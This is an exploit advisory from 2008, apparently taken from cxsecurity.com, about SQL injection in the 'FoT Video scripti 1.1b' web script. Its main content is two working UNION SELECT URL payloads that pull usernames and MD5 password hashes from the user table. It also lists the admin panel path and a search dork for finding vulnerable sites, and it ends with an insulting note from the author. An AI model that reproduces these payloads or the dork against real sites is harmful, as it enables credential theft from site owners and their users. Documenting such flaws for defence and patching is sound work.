FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability

2008.09.27
Credit: cashr00t
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

************************************************************************************** Author : By Crackers_Child Contact: cashr00t@hotmail.com ************************************************************************************** Script : FoT Video scripti V1.1 Beta ************************************************************************************** Exploit : For username you can read username on title www.site.com/script_path/izle.asp?oyun=56+union+select+0,1,KULLANICIADI,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI ************************************************************************************** Exploit : For Password(md5 hash) you can read password on title www.site.com/script_path/izle.asp?oyun=56+union+select+0,1,PAROLA,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI ************************************************************************************** Administrator Path www.site.com/script_path/yonetim_default.asp ************************************************************************************** Dork : inurl:"izle.asp?oyun= ************************************************************************************** N0te : Hepinizn Aq :lol **************************************************************************************

References:

http://xforce.iss.net/xforce/xfdb/45098
http://www.securityfocus.com/bid/31166


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top